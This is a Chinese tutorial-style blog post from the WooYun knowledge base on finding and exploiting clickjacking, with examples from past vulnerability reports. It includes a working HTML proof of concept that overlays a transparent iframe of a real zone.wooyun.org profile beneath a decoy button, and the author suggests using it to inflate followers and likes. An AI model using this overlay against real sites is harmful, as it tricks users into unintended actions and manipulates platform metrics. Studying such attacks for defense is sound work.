0x00简介


1 说起clickjacking,很多人其实都不知道是干嘛的。比起XSS来说,clickjacking显得比较神秘,乌云漏洞库里面的相关的漏洞也不到10条而已。

2 瞌睡龙之前发过一篇clickjacking的技术文档,主要是介绍clickjacking出现的原因,以及防御的方法。我这里主要是介绍,怎么寻找clickjacking以及怎么去利用。 Clickjacking简单介绍

提醒一下click jacking和json hijacking完全不是一个东西额,这里大家不要混淆了。

0x01 案例


1 ClickJacking

腾讯微博ClickhiJacking

新浪微博点击劫持刷粉丝

2 Xss 结合 ClickJacking

百度主站反射型XSS漏洞

百度贴吧贴内一处Mouseover XSS利用

百度翻译反射型XSS(点击劫持demo)

可以看到配合clickjacking,某些看起来比较鸡助的XSS或者不起眼的设置,也会产生比较严重的危害额。

0x02 实例讲解


说了这么多,不知道有么有理解。看下面的实例吧。

用另一个低级的漏洞向豌豆荚用户手机后台静默推送并安装任意应用

他这里是将自己设计了一个页面,然后上面伪造了一个领奖按钮,然后将iframe嵌套的原网页的推送与其领奖的按钮进行了重叠。

不过不知道是洞主笔误,还是洞主对于clickjacking的描述还是有一些错误。

这里洞主的描述显然是有问题的。

正确的原理应该是这样,这个领奖的页面是在下面,而原iframe的那个页面在最上面。然后第一个图由于将iframe完全透明了,所以用户就只能看到下面的那个领奖页面。然后用户点击领奖,其实是点击了上层页面中的推送。

所以蓝色圈圈那个位置,应该是“上面”而不是“下面”。

0x03 Zone ClickJacking挖掘


之前看到瞌睡龙的这个文章的下面,剑心说要赶紧给zone的感谢加上clickjacking的防御。

然后我看了下,zone的感谢加了个confrim,不过其实这种只是可以减轻clickjacking的威力,并不能得到根治啊,完全可以构造2个点骗用户点击的。

然后zone的关注、喜欢、不喜欢这些功能也没有防御,目测zone应该是完全没有防御clickjacking。不过试了试,乌云主站还是对clickjacking进行了防御的,会检测url有么有被iframe嵌套。

下面给个测试poc,有兴趣的可以自己研究研究更好的利用环境。

1

2

3

4

5

6

7

8

9

10

11

12

<code>#!html

<html>

    <head>

        <meta charset="utf-8" />

        <title>clickjacking demo</title>

    </head>

    <div style="z-index:999;opacity:0.3;width:500px; height:500px;overflow:hidden;position:absolute;top:20px;left:20px;">

        <iframe id="inner" style="position:absolute;top:140px;width:1000px;height:500px;left:-484px;" src="http://zone.wooyun.org/user/px1624"></iframe>

    </div>

    <button id="anwoa" style="cursor:pointer;z-index:10px;position:absolute;top:225px;left:200px;text-align:center;width:100px;height:57px;">按我啊</button>

</html>

</code>

利用这个clickjacking的poc代码,就可以给自己刷点乌云zone的粉丝了。

同时,还可以给自己zone里面的帖子刷喜欢数量。据说这个喜欢数量可是和zone里面的领主算法息息相关的额!

本文章来源于乌云知识库,文章版权归乌云知识库!

clickjacking漏洞的挖掘与利用相关推荐

  1. Web漏洞的挖掘与利用

    本文章仅供学习分享使用,不做任何违法行为!!! 一.漏洞的挖掘 sql注入漏洞: 判断一个网站是否存在一个sql注入的漏洞?Id=1 如果判断出来存在sql注入漏洞,则进判断sql注入的闭合字符 ?i ...

  2. Fckeditor常见漏洞的挖掘与利用整理汇总

    查看编辑器版本号 FCKeditor/_whatsnew.html ------------------------------------------------------------- 2. V ...

  3. SDCMS 1.1sp1的XSS漏洞的挖掘与利用

    本文已发<黑客防线>第六期(转载请注明) SDCMS全称:时代网站信息管理系统.SDCMS是基于ASP+ACCESS/MSSQL的网站信息管理系统.永久免费,开源! SDCMS以信息为主题 ...

  4. ctf中linux内核态的漏洞挖掘与利用系列1

    说明 该系列文章主要是从ctf比赛入手,针对linux内核上的漏洞分析.挖掘与利用做讲解,本篇文章主要介绍内核漏洞利用所需的前置知识以及准备工作. linux内核态与用户态的区别 以 Intel CP ...

  5. 视频教程-SQL注入与SQLmap工具-漏洞挖掘与利用

    SQL注入与SQLmap工具 玄道,从混迹漏洞平台与SRC应急响应中心的白帽子到创业乙方的技术与运营 刘畅 ¥15.00 立即订阅 扫码下载「CSDN程序员学院APP」,1000+技术好课免费看 AP ...

  6. 视频教程-逆向工程:游戏安全入门教程-漏洞挖掘与利用

    逆向工程:游戏安全入门教程 杨闯(rkvir)天融信阿尔法实验室安全研究员.看雪漏洞分析小组成员,看雪讲师,MS08067小组成员.从事安全行业多年,擅长二进制安全领域的研究与工程化实现.有多年教育经 ...

  7. Apache Shiro权限绕过漏洞 (CVE-2020-11989) 挖掘分析和复现

     聚焦源代码安全,网罗国内外最新资讯! 1.1 状态 完成漏洞挖掘条件分析.漏洞复现. 1.2 简介 Apache Shiro作为Java框架,可被用于身份认证.授权等任务. 整合Apache Shi ...

  8. XXE漏洞详解与利用

    XXE:XML 外部实体注入 XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件.执行系统命令.内网探测与攻击等危害的一 ...

  9. java反序列化漏洞POP查找_利用 Java 反序列化漏洞在受限环境下获取反向 Shell

    原标题:利用 Java 反序列化漏洞在受限环境下获取反向 Shell 原文链接: https://medium.com/abn-amro-red-team/java-deserialization-f ...

最新文章

  1. 梯度下降优化算法综述与PyTorch实现源码剖析
  2. javascript网页特效_南通建网站哪些,网页设计维护
  3. react 使用 leaflet 百度地图_【React】react项目中应用百度地图添加起始点绘制路线...
  4. c++builder 6 转成vs_官方:欧洲杯将在2021年6月11日至7月11日进行,举办城市不变...
  5. 学会shell 基本语法,玩转linux
  6. mysql 只显示箭头_为什么在DOS窗口中使用MySQL时,输入命令后只出现一个箭头,输入什么内容都是这样?...
  7. 微信开发之微信公众平台基本配置--服务器token验证(Java实现)
  8. javascript监听输入框_js与jquery实时监听输入框值的oninput与onpropertychange方法
  9. Oralce数据库计算工作日(处理假期及加班)
  10. “磁碟机”病毒详尽分析报告
  11. HDLBITS 练习 卡诺图化简部分
  12. Excel代替matplotlib画散点图 拟合曲线
  13. ie浏览器代理设置方法 怎么给IE浏览器设置代理?
  14. 有关期货公司出入金问题(期货的出入金)
  15. dvdscr是什么意思?什么是dvdscr格式?
  16. Maven:A cycle was detected in the build path of project 'xxx'. The cycle consists of projects {xx}
  17. html 字体图标不显示不出来了,h5页面字体图标显示不正常
  18. 如何实现‘请在微信客户端打开链接’
  19. 汉字编码中区位码、国标码和机内码的区别
  20. a8处理器相当于骁龙几_天玑800相当于骁龙多少 天玑800和骁龙765G对比哪个好

热门文章

  1. JavaScript客户端脚本语言的应用
  2. 【Unity百宝箱】游戏中的用户数据存档 | Json序列化和反序列化 | 数据加密和解密 | 干货游戏教程
  3. qa职业规划_INTP职业规划模型及个案详细解析
  4. 维基百科里 的intj  直接复制的html .还是有点乱
  5. 徐小明20110913分析
  6. make 常用命令参数
  7. 名悦集团:五一小长假高速免费,请收好老司机出行指南
  8. 理解同步传输与异步传输(一)
  9. Modbus转profinet网关连接Smart PLC与ABB变频器实现Modbus通信
  10. uva 11491 Erasing and Winning